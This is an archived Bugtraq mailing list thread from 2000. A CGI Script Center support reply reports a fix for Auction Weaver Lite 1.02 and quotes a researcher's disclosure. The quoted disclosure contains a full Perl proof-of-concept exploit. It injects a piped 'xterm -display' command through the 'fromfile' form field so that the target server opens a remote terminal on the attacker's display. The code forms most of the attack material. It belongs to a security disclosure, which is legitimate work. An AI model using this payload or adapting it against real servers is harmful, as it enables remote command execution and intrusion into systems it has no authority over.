Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: More problems with Auction Weaver & CGI Script Center.
From: CGI Script Center Support <support () cgiscriptcenter com>
Date: Sat, 2 Sep 2000 16:49:02 -0700

Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.

All files being opened for reading have now been updated.

I have only been able to check the below exploit on the shareware
version, but I strongly believe that the PRO version is exploitable
as well.

No Professional version is yet available.

The below exploit should no longer be valid.

CGI Script Center Support
support () cgiscriptcenter com


-----Original Message-----
From: teleh0r - [mailto:teleh0r () doglover com]
Sent: Wednesday, August 30, 2000 10:21 AM
To: BUGTRAQ () SECURITYFOCUS COM
Cc: support () cgiscriptcenter com
Subject: More problems with Auction Weaver & CGI Script Center.


CGI Script Center recently upgraded Auction Weaver 1.0 to
1.2 due to a security issue found and reported by Meliksah Ozoral.

Today, I decided to take a look at Auction Weaver just to check
if the issue and possible other security problems were now fixed.

I guessed they had taken a *close* look at their scripts, considering
the problems reported lately - but I guessed wrong...

I have only been able to check the below exploit on the shareware
version, but I strongly believe that the PRO version is exploitable
as well.

Or perhaps only those who pays gets secure scripts? Maybe that would
be a successful business policy? ;)

CGI Script Center, _please_ contact me if you want help securing your
scripts.

Sincerely yours,
teleh0r

8<---auctionweaver-exploit.pl------------------------------------


#!/usr/bin/perl -w

## Auction Weaver 1.02 / Only confirmed with LITE
##        -  Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn a xterm from $target
## to $attacker.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0r () doglover com / anno 2000
## http://teleh0r.cjb.net

use strict; use Socket;

if (@ARGV < 3) {
print("Usage: $0 <target> <attacker> <dpy>\n");
exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
$agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

if ($dpy !~ /\d/) {
print("dpy must be a number, probably 0\n");
exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 138 + length($attacker.$dpy);

$cgicode =
"flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1
&catdir".
"=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem
=1&sbut".
"ton=BID";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.

$sploit=
"POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)


-----------------------------------------------------------------


______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]